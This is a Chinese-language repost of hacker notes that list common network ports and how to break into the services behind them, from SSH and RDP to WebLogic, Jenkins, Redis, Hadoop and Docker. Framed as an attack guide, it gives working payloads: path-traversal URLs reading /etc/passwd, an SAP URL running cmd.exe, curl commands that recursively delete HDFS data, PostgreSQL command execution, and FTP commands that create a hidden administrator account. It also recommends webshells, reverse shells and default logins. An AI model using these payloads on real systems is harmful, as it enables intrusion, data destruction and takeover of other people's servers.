Zi 字媒體
2017-07-25T20:27:27+00:00
常見網路埠(PORT)滲透(駭入) 黑客/駭客筆錄
資料來源: https://mp.weixin.qq.com/s?__biz=MzIyMDEzMTA2MQ==&mid=2651152240&idx=2&sn=e1b8a38c01fad8f8eff13f2cec336495&chksm=8c2144eabb56cdfcd5dee4f42cf10a0c211809e0690002700eb9a353a292e2302ed741aa79fb&scene=126&sessionid=1595899253&key=7674ee21d747fecfee13314359d8dcaf941b76129d8b14810c9931aee608651749897386282787e8e14ed7129fb963a6380650d9d026eff44decb6f81991930167f9d59ab0490ccc3440035a55ce7c1b&ascene=1&uin=MjIwODk2NDgxNw==&devicetype=Windows+10+x64&version=62090529&lang=zh_TW&exportkey=AtbU4kZzI3ZKKWMU45+ev4s=&pass_ticket=JJEmjBpPvJCtmH9Wn54FpB+hYrxSxNTlT3OneYBMt3NEAMfnleETJFjmG943cHJ5
1、遠程管理埠
22 埠(SSH)
安全攻擊:弱口令、暴力猜解、用戶名枚舉
利用方式:
1、通過用戶名枚舉可以判斷某個用戶名是否存在於目標主機中,
2、利用弱口令/暴力破解,獲取目標主機許可權。
23 埠(Telnet)
安全性漏洞:弱口令、明文傳輸
利用方式:
1、通過弱口令或暴力破解,獲取目標主機許可權。
2、嗅探抓取telnet明文帳戶密碼。
3389 埠(RDP)
安全性漏洞:暴力破解
利用方式:通過弱口令或暴力破解,獲取目標主機許可權。
5632 埠(Pcanywhere)
安全性漏洞:弱口令、暴力破解
利用方式:通過弱口令或暴力破解,獲取目標主機許可權
5900 埠(VNC)
安全性漏洞:弱口令、暴力破解
利用方式:通過弱口令或暴力破解,獲取目標主機許可權。
2、Web中間件/服務埠
1090/1099 埠(RMI)
安全性漏洞:JAVA RMI 反序列化遠端命令執行漏洞
利用方式:使用nmap檢測埠資訊。
埠資訊:1099/1090 Java-rmi Java RMI Registry
檢測工具:attackRMI.jar
7001 埠(Weblogic)
安全性漏洞:弱口令、SSRF、反序列化漏洞
利用方式:
1、控制台弱口令上傳war木馬
2、SSRF內網探測
3、反序列化遠端代碼執行等
8000 埠(jdwp)
安全性漏洞:JDWP 遠端命令執行漏洞
埠資訊:
8000 jdwp java Debug Wire Protocol
檢測工具:https://github.com/IOActive/jdwp-shellifier
8080 埠(Tomcat)
安全性漏洞:弱口令、示例目錄
利用方式:通過弱口令登錄控制台,上傳war包。
8080 埠(Jboss)
安全性漏洞:未授權訪問、反序列化。
利用方式:
1、未授權存取控制台,遠端部署木馬
2、反序列化導致遠端命令執行等。
檢測工具:https://github.com/joaomatosf/jexboss
8080 埠(Resin)
安全性漏洞:目錄遍歷、遠端檔讀取
利用方式:通過目錄遍歷/遠端檔讀取獲取敏感資訊,為進一步攻擊提供必要的資訊。
任意文件讀取POC:
payload1 = “/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd”
payload2 = “/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd”
payload3 = “/ ..\\\\web-inf”
8080 埠(Jetty)
安全性漏洞:遠程共用緩衝區洩漏
利用方式:攻擊者可以通過精心構造headers值來觸發異常並偏移到共用緩衝區,其中包含了之前其他用戶提交的請求,伺服器會根據攻擊者的payload返回特定位置的資料。
檢測工具:https://github.com/GDSSecurity/Jetleak-Testing-Script
8080 埠(GlassFish)
安全性漏洞:弱口令、任意檔讀取
利用方式:
1、弱口令admin/admin,直接部署shell
2、任意檔讀取獲取伺服器敏感配置資訊
8080 埠(Jenkins)
安全性漏洞:未授權訪問 、遠端代碼執行
利用方式:訪問如下url,可以執行指令碼命令,反彈shell,寫入webshell等。
http://:8080/manage
http://:8080/script
8161 埠(ActiveMQ)
安全性漏洞:弱口令、任意檔寫入、反序列化
利用方式:預設密碼admin/admin登陸控制台、寫入webshell、上傳ssh key等方式。
9043 埠(webSphere)
安全性漏洞:控制台弱口令、遠端代碼執行
後臺地址:https://:9043/ibm/console/logon.jsp
50000 埠(SAP)
安全性漏洞:遠端代碼執行
利用方式:攻擊者通過構造url請求,實現遠端代碼執行。
POC:http://:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all
50070 埠(hadoop)
安全性漏洞:未授權訪問
利用方式:攻擊者可以通過命令列操作多個目錄下的資料,如進行刪除操作。
curl -i -X DELETE “http://ip:50070/webhdfs/v1/tmp?op=DELETE&recursive=true“
curl -i -X PUT “http://ip:50070/webhdfs/v1/NODATA4U_SECUREYOURSHIT?op=MKDIRS“
3、數據庫埠
389 埠(ldap)
安全性漏洞:未授權訪問 、弱口令
利用方式:通過LdapBrowser工具直接連入。
1433 埠(Mssql)
安全性漏洞:弱口令、暴力破解
利用方式:差異備份getshell、SA帳戶提權等
1521 埠(Oracle)
安全性漏洞:弱口令、暴力破解
利用方式:通過弱口令/暴力破解進行入侵。
3306 埠(MySQL)
安全性漏洞:弱口令、暴力破解
利用方式:利用日誌寫入webshell、udf提權、mof提權等。
5432 埠( PostgreSQL)
安全性漏洞:弱口令、高許可權命令執行
利用方式:攻擊者通過弱口令獲取帳號資訊,連入postgres中,可執行系統命令。。
PoC參考:
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM ‘id’;
SELECT * FROM cmd_exec;
5984 埠(CouchDB)
安全性漏洞:垂直許可權繞過、任意命令執行
利用方式:通過構造資料創建管理員使用者,使用管理員用戶登錄,構造惡意請求觸發任意命令執行。
後臺訪問:http://:5984/_utils
6379 埠(Redis)
安全性漏洞:未授權訪問
利用方式:絕對路徑寫webshell 、利用計畫任務執行命令反彈shell、
公私密金鑰認證獲取root許可權、主從複製RCE等。
9200 埠(elasticsearch)
安全性漏洞:未授權訪問、命令執行
檢測方式:
1、直接訪問如下url,獲取相關敏感資訊。
http://:9200/_nodes 查看節點資料
http://:9200/_river 查看資料庫敏感資訊
2、通過構造特定的資料包,執行任意命令。
11211 埠(MemCache)
安全性漏洞:未授權訪問
檢測方式:無需用戶名密碼,可以直接連接memcache 服務的11211埠。
nc -vv 11211
27017 埠(Mongodb)
安全性漏洞:未授權訪問、弱口令
利用方式:未授權訪問/弱口令,遠端連入資料庫,導致敏感資訊洩露。
4、常見協議埠
21 埠(FTP)
安全性漏洞:1、配置不當 2、明文傳輸 3、協力廠商軟體提權
利用方式:
1、匿名登入或弱口令
2、嗅探ftp用戶名和密碼
3、Serv-U許可權較大的帳號可導致系統命令執行。FTP提權命令:
# 增加系統使用者
Quote site exec net user 4567 4567 /add
# 提升到管理員許可權
Quote site exec net localgroup administrators 4567 /add
25 埠(SMTP)
攻擊方式:1、匿名張貼郵件 2、弱口令 3、SMTP用戶枚舉
利用方式:
1、SMTP伺服器配置不當,攻擊者可以使用任意用戶發送郵件。
2、SMTP弱口令掃描,獲取使用者帳號密碼,發送郵件釣魚。
3、通過SMTP用戶枚舉獲取用戶名:
nmap -p 25 — smtp-enum-users.nse
53 埠(DNS)
安全攻擊:1、DNS域傳送漏洞、DNS欺騙、DNS緩存投毒
檢測方式:
1、DNS域傳送漏洞,Windows下檢測使用nslookup命令,Linux下檢測使用dig命令,通過執行命令可以清楚的看到功能變數名稱解析情況。
2、DNS欺騙就是攻擊者冒充功能變數名稱伺服器的一種欺騙行為。
3、DNS緩存投毒是攻擊者欺騙DNS伺服器相信偽造的DNS回應的真實性。
161 埠(SNMP)
安全性漏洞:默認團體名/弱口令訪問
利用方式:通過nmap自帶的審計腳本進行檢測,可能導致敏感資訊洩露。。
1、弱口令檢測:nmap –sU –p161 –script=snmp-brute
2、獲取系統資訊:nmap –sU –p161 –script=snmp-sysdescr
3、獲取使用者資訊:nmap -sU -p161 –script=snmp-win32-user
4、獲取網路埠狀態:nmap -sU -p161 –script=snmp-netstat
443 埠(SSL)
安全性漏洞:OpenSSL 心臟出血
利用方式:攻擊者可以遠端讀取存在漏洞版本的openssl伺服器記憶體中長大64K的資料。
掃描腳本:nmap -sV –script=ssl-heartbleed
445 埠(SMB)
安全性漏洞:資訊洩露、遠端代碼執行
利用方式:可利用共用獲取敏感資訊、緩衝區溢位導致遠端代碼執行,如ms17010。
873 埠(Rsync)
安全性漏洞:匿名訪問、弱口令
利用方式:攻擊者可以執行下載/上傳等操作,也可以嘗試上傳webshell。
1、下載:#rsync -avz a.b.c.d::path/file path/filiname
2、上傳:#rsync -avz path/filename a.b.c.d::path/file
2181 埠(Zookeeper)
安全性漏洞:未授權訪問
檢測方式:攻擊者可通過執行envi命令獲得系統大量的敏感資訊,包括系統名稱、Java環境。
echo envi | nc ip port
2375 埠(Docker)
安全性漏洞:未授權方式
檢測方式:通過docker daemon api 執行docker命令。
#列出容器資訊,效果與docker ps -a 一致。
curl http://:2375/containers/json
docker -H tcp://:2375 start
寫了
5860316篇文章,獲得
23313次喜歡